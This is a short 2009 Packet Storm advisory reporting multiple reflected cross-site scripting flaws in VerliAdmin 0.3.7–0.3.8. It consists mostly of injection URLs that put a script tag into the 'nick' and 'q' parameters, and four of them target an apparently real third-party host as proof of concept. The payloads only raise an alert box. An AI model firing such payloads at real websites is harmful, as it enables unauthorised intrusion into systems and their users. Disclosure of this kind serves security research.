VerliAdmin Cross Site Scripting

2009-05-05T00:00:00
ID PACKETSTORM:77287
Type packetstorm
Reporter TEAMELITE
Modified 2009-05-05T00:00:00

Description

                                        
                                            `VerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities  
  
http://bohyn.czechweb.cz   
  
- 5-05-2009  
  
- Methodman - http://nemesis.te-home.net   
  
-Example:   
  
http//:verliadmin.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>   
  
http//:verliadmin.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>  
  
http//:verliadmin.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>  
  
http//:verliadmin.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>   
  
  
-Proof of Concept:   
  
  
http://alfa.hub.lv/alfa/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>   
  
http://alfa.hub.lv/alfa/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://alfa.hub.lv/alfa/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://alfa.hub.lv/alfa/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>   
  
  
/teamelite 2009  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`